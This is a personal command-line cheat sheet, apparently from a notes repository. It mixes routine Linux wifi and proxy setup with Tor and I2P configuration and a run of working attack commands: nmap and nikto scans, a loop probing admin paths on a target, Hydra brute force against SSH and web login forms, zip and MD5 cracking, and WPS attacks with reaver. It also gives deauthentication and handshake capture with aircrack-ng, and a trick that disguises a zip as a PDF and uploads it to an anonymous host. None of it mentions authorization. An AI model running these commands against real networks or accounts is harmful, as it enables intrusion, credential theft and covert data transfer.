nmcli -m multiline  -f ALL device wifi

# alternative way 
iwlist wlan0 scan 

# alternative way
iw wlan0 scan

# alternative way: interactive wifi monitor
sudo apt install wavemon
wavemon

connect to selected network

# install tool
apt-get install wireless-tools wpasupplicant
# save password ( wpa_passphrase <SSID> [passphrase]; the passphrase is read from stdin when omitted )
wpa_passphrase YourSSID YourPassphrase >> /etc/wpa_supplicant.conf

# check adapter
iwconfig
# connect to network
wpa_supplicant -D wext -i wlan0 -B -c /etc/wpa_supplicant.conf

# sudo systemctl restart wpa_supplicant
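
On systems managed by NetworkManager the same connection can be made with nmcli instead of raw wpa_supplicant. A minimal sketch; SSID and passphrase are placeholders.

```bash
# connect via NetworkManager
nmcli device wifi connect "YourSSID" password "YourPassphrase" ifname wlan0
# verify which network is active
nmcli -t -f ACTIVE,SSID device wifi | grep '^yes'
```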

check your current IP address

  • check ip address via proxy
curl --proxy localhost:8118 'https://api.ipify.org'
curl 'https://api.ipify.org'
curl --silent -X GET https://getfoxyproxy.org/geoip/ | grep -A 2 "Your IP Address and Location" | awk -F "strong" '{print $2 $4}' | tr '><' ' '
  • check ip address directly
curl 'https://api.ipify.org'
curl 'https://api.ipify.org?format=json'
// browser console alternative
fetch('https://api.ipify.org')
  .then(response => {
    if (!response.ok) {
      throw new Error(`HTTP error! Status: ${response.status}`);
    }
    return response.text();
  })
  .then(ip => {
    console.log('Your IP address is:', ip);
  })
  .catch(error => {
    console.error('There was an error fetching the IP address:', error);
  });
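
The two curl calls can also be combined into a quick script that shows whether the proxy actually changes the egress address. A minimal sketch, assuming privoxy listening on localhost:8118 as in the example above.

```bash
# compare direct and proxied egress IP
direct_ip=$(curl --silent 'https://api.ipify.org')
proxy_ip=$(curl --silent --proxy localhost:8118 'https://api.ipify.org')
echo "direct: ${direct_ip}"
echo "proxy:  ${proxy_ip}"
[ "${direct_ip}" != "${proxy_ip}" ] && echo "proxy is effective" || echo "same IP - proxy not in use"
```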

proxy

proxy list tools

https://github.com/cherkavi/python-utilitites/blob/master/proxy/foxyproxy-generator.py
https://addons.mozilla.org/de/firefox/addon/foxyproxy-standard/

Darknet connection

activate tor connection

  • installation
sudo apt install tor
sudo apt install privoxy
  • configuration sudo vim /etc/privoxy/config ( enable only one of the two forward rules below )
forward-socks5t / 127.0.0.1:9050 .
forward-socks4a / 127.0.0.1:9050 .
  • applying
# tor
sudo service tor restart
# /etc/init.d/privoxy start
sudo service privoxy restart
  • check your ip afterwards ( a Tor-specific check is sketched after this list )
# via TOR 
curl --proxy localhost:8118 'https://api.ipify.org'
# direct connect
curl 'https://api.ipify.org'
  • stop, stop tor, stop private proxy
systemctl stop tor
systemctl status tor

systemctl stop privoxy
systemctl status privoxy
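
To confirm that traffic really leaves through Tor and not just through some proxy, the official check endpoint can be queried. A minimal sketch, assuming the default privoxy (8118) and Tor SOCKS (9050) ports configured above.

```bash
# via the privoxy -> tor chain
curl --silent --proxy localhost:8118 https://check.torproject.org/api/ip
# straight to the Tor SOCKS port, with DNS also resolved through Tor
curl --silent --socks5-hostname 127.0.0.1:9050 https://check.torproject.org/api/ip
# expected answer when Tor is in use: {"IsTor":true,"IP":"..."}
```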

activate i2p(Invisible Internet Project) connection

  • installation
sudo apt update
sudo apt install openjdk-8-jre i2p
  • open ports
iptables -I INPUT 1 -i wlan0 -p tcp --tcp-flags SYN,RST,ACK SYN --dport 20000 -m conntrack --ctstate NEW -j ACCEPT
iptables -I INPUT 1 -i wlan0 -p udp --dport 20000 -m conntrack --ctstate NEW -j ACCEPT
  • start service
/usr/bin/i2prouter start
  • i2p router panel
x-www-browser http://127.0.0.1:7657/
  • use privoxy? ( chaining privoxy to the I2P HTTP proxy is sketched below )
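
The I2P router exposes its own HTTP proxy on 127.0.0.1:4444 by default, which can be used directly or chained behind privoxy. A minimal sketch; example.i2p is a placeholder eepsite address.

```bash
# talk to an eepsite through the I2P HTTP proxy directly
curl --silent --proxy 127.0.0.1:4444 http://example.i2p/ | head

# or chain privoxy to it: add this line to /etc/privoxy/config and restart privoxy
# forward .i2p 127.0.0.1:4444
```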

Remote host analyzing

whois cli console whois

# apt install whois
whois google.com

scan ports

nmap -sV -p 1-65535 {hostname}

web scan

nikto -h {hostname}

cms detector ContentManagementSystem detector

https://www.web4future.com/free/cms-detector.htm
https://whatcms.org
https://builtwith.com

detect possible endpoints

find cms: https://2ip.ru/cms

/robots.txt
/admin.php
/admin
/admin/admin.php
/manager
/administrator
/login
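
The common paths above can be checked quickly with a small curl loop. A minimal sketch; the target URL is a placeholder and only the HTTP status codes are printed.

```bash
# probe common admin/login endpoints and print the response codes
TARGET="https://target.example.com"   # placeholder, replace with the host under test
for path in /robots.txt /admin.php /admin /admin/admin.php /manager /administrator /login; do
  code=$(curl --silent --output /dev/null --write-out "%{http_code}" "${TARGET}${path}")
  echo "${code}  ${TARGET}${path}"
done
```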

Request information

Remote host connection

Hydra

# installation
apt install hydra
# usage: hydra -l <username> -p <password> <server> <service> -o <log output file> -s <custom service port> 
# usage: hydra -L <username file> -P <password file> <server> <service>
# usage: hydra -l <username> -p <password> -M <server list> <service> -o <log output file> -s <custom service port> 
# usage: hydra -C <file with login:password colon delimiter> -M <server list> <service> -o <log output file> -s <custom service port> 

hydra -l admin -p admin_pass 10.10.10.10 ssh
hydra -L logins.txt -P passwords.txt 10.10.10.10 ssh -o output.log
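
Besides ssh, hydra can also brute-force web login forms via the http-post-form module. A minimal sketch; the form path, field names and the failure string are assumptions that must be adjusted to the target.

```bash
# web form brute force: "<path>:<POST body with ^USER^/^PASS^ placeholders>:<string marking a failed login>"
hydra -L logins.txt -P passwords.txt 10.10.10.10 http-post-form \
  "/login:username=^USER^&password=^PASS^:F=Invalid credentials" -o output.log
```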

online services

online text info exchange

GSM

phone info

HLR request

sms

sms receive

e-mail

temp email address

permanent providers

regular mail providers

https://alternativeto.net/software/openmailbox/

files

zip -r archive.zip folder/to/compress
mv archive.zip archive.pdf
vim archive.pdf # "%PDF-1.5"
curl -i -F name=some-archive.pdf -F [email protected] https://uguu.se/api.php?d=upload | grep "uguu.se"
wget https://a.uguu.se/1JQuulht48T6_1571004483891-2.pdf
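
On the receiving side the download is still an ordinary zip archive with a fake header and extension, so it can be unpacked directly; unzip only warns about the extra leading bytes because the zip central directory sits at the end of the file. A minimal sketch reusing the file name from the wget line above.

```bash
# restore the downloaded "pdf" back into a regular archive
mv 1JQuulht48T6_1571004483891-2.pdf archive.zip
unzip archive.zip -d restored/    # warns about extra bytes before the zip data, extraction still works
```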

archive

open zip with brute force zip

# sudo apt install fcrackzip
fcrackzip --brute-force --length 1-20 --use-unzip 1.zip
fcrackzip -v -u -b 1.zip

# statistic: 8 chars - 62 days
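
Pure brute force on longer passwords is impractical (see the statistic above), so a dictionary attack is usually the first attempt. A minimal sketch; the wordlist path is an assumption.

```bash
# dictionary attack: -D dictionary mode, -p path to the wordlist, -u verify candidates with unzip
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt 1.zip
```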

wifi

initiate monitor mode on interface

ifconfig 
# ( result - wlan0 )
airmon-ng check kill
airmon-ng check 
# ( should be empty )
airmon-ng start wlan0 
# ( result - wlan0mon )
airodump-ng wlan0mon 
# ( result - BSSID )
reaver -i wlan0mon -b <BSSID> -vv -K 1
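
The reaver line above targets WPS; when WPS is disabled, the classic alternative is to capture a WPA handshake and run a wordlist against it. A minimal sketch; channel, BSSID and wordlist path are placeholders.

```bash
# capture traffic of one access point until "WPA handshake" appears in the airodump-ng header
airodump-ng --bssid <BSSID> -c <channel> -w capture wlan0mon
# optional: force clients to reconnect so the handshake is captured faster
aireplay-ng --deauth 5 -a <BSSID> wlan0mon
# offline wordlist attack against the captured handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
```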

md5sum, hash

https://hashkiller.co.uk/Cracker/MD5
https://md5decrypt.net
https://www.md5.ovh/index.php?controller=Api
https://crackstation.net/
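
Besides the online services above, MD5 hashes can be attacked locally. A minimal sketch, assuming hashcat is installed and using a common wordlist path as a placeholder.

```bash
# create a test hash and crack it offline (hashcat mode 0 = raw MD5, attack mode 0 = straight wordlist)
echo -n 'password123' | md5sum | awk '{print $1}' > hash.txt
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 0 hash.txt --show    # print cracked results
```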

android

android market
